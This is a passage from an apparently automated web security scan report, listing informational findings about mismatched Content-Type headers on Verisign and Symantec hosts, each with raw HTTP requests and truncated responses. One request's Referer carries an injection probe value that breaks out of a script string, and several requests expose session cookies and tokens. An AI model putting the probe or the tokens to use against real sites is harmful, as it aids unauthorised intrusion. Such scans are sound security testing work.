Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 471

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElemen
...[SNIP]...

23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.boxshadow.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:27 GMT
Content-Length: 1538

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 1
Expires: Sun, 09 Oct 2011 21:38:26 GMT
Content-Length: 1356

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 39037
Expires: Sun, 09 Oct 2011 10:47:51 GMT
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...

23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/oo-engine.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 1154

/* OnlineOpinion (S3tS v3.1) */

/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

var custom_var,
...[SNIP]...

23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 77341
Expires: Sun, 09 Oct 2011 00:09:34 GMT
Content-Length: 4102


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/shared.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:29 GMT
Content-Length: 37327

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

23.22. https://cert.webtrust.org/ViewSeal

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ViewSeal HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:30 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2834

java.lang.NumberFormatException: null
   at java.lang.Integer.parseInt(Integer.java:394)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29)
   
...[SNIP]...

23.23. http://com-verisign.netmng.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?async=1&ref= HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:39 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:24:39 GMT
Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/
Content-Length: 3418
Connection: close
Content-Type: text/html; charset=UTF-8

function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"
...[SNIP]...

23.24. https://fileconnect.symantec.com/images/Sigstand.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://fileconnect.symantec.com
Path:   /images/Sigstand.jpg

Issue detail

The response contains the following Content-type statement:

Content-type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/Sigstand.jpg HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:56 GMT
Content-length: 2534
Content-type: image/jpeg
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

GIF89a..%..........ddd........k..............................oR.........VCCC...]]]$$$.................3...222..,...<<<......vvv......XXX+++...............mmmppp.....{UUU...yyy.....D.........jjj..&....
...[SNIP]...

23.25. http://free.pctools.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://free.pctools.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Dec 2010 03:15:40 GMT
ETag: "738b5b-57e-496c96b526f00"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Date: Fri, 09 Sep 2011 22:05:57 GMT
Connection: close

..............h.......(....... .................................\...............6.......M...G...H...[.......5.......U...........X...J...3...k...i...W...O.......?...i...W...|...............K...K.......
...[SNIP]...

23.26. http://gs.instantservice.com/geoipAPI.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://gs.instantservice.com
Path:   /geoipAPI.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /geoipAPI.js?src=ii3&ts=1315621724 HTTP/1.1
Host: gs.instantservice.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:14 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 355
Connection: close
Content-Type: text/javascript; charset=utf-8

isgeoipapi_continent_code = "NA";isgeoipapi_country_code = "US";isgeoipapi_country_name = "United States";isgeoipapi_region = "TX";isgeoipapi_city = "Dallas";isgeoipapi_dma_code = "623";isgeoipapi_are
...[SNIP]...

23.27. https://idprotect.verisign.com/common/scripts/dlText.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /common/scripts/dlText.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /common/scripts/dlText.js HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:57 GMT
Accept-Ranges: bytes
ETag: W/"19229-1310089722000"
Last-Modified: Fri, 08 Jul 2011 01:48:42 GMT
Content-Type: text/javascript
Content-Length: 19229
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

linkData['DL_0'] = 'Supported Mobile Devices';
linkData['DL_1'] = 'Select Your Mobile Device';
linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname;
linkData
...[SNIP]...

23.28. https://idprotect.verisign.com/imageapp.v

Summary

Severity:   Information
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /imageapp.v

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /imageapp.v?Image=tmobile_de HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/wheretouse.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:51:34 GMT
Content-Disposition: filename=getimage.jpeg
Content-Type: image/jpeg
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 491

GIF89a..2........................................o.._..`..P..@..?..0.. z..q..g..............................!.......,......2.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.......n..m.:.v
...[SNIP]...

23.29. https://idprotect.verisign.com/membersites.v

Summary

Severity:   Information
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /membersites.v

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /membersites.v?DATA={REGION:ALL,CATEGORY:FEATURED_ONLY,ACCOUNT_TYPE:ALL} HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://idprotect.verisign.com/wheretouse.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:53 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7124
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

[{"id":27323,"logoImage":null,"isPartner":0,"description":"Merrill Lynch","isFeatured":1,"name":"merrilllynch","hasImageLogo":1,"displayOrder":1,"webLink":"http://www.ml.com/","code":"merrilllynch","b
...[SNIP]...

23.30. https://knowledge.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://knowledge.verisign.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "342ce-47e-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/plain

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

23.32. http://partnerlocator.symantec.com/public/product_finder

Summary

Severity:   Information
Confidence:   Firm
Host:   http://partnerlocator.symantec.com
Path:   /public/product_finder

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /public/product_finder HTTP/1.1
Host: partnerlocator.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:45:58 GMT
Content-Type: text/html
Connection: close
Content-Length: 34

<h1>500 Internal Server Error</h1>

23.33. http://partnerlocator.symantec.com/public/pulldown_list

Summary

Severity:   Information
Confidence:   Firm
Host:   http://partnerlocator.symantec.com
Path:   /public/pulldown_list

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/pulldown_list;plist=country;search_term=usa;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
X-Prototype-Version: 1.5.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Size: 20
Content-Length: 20

No Matching Partners

23.34. http://player.ooyala.com/info/primary/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://player.ooyala.com
Path:   /info/primary/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /info/primary/ HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 381
Date: Fri, 09 Sep 2011 21:25:47 GMT
Connection: close
Vary: Accept-Encoding

LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ
...[SNIP]...

23.35. http://player.ooyala.com/sas/authorized

Summary

Severity:   Information
Confidence:   Firm
Host:   http://player.ooyala.com
Path:   /sas/authorized

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain script.

Request

GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
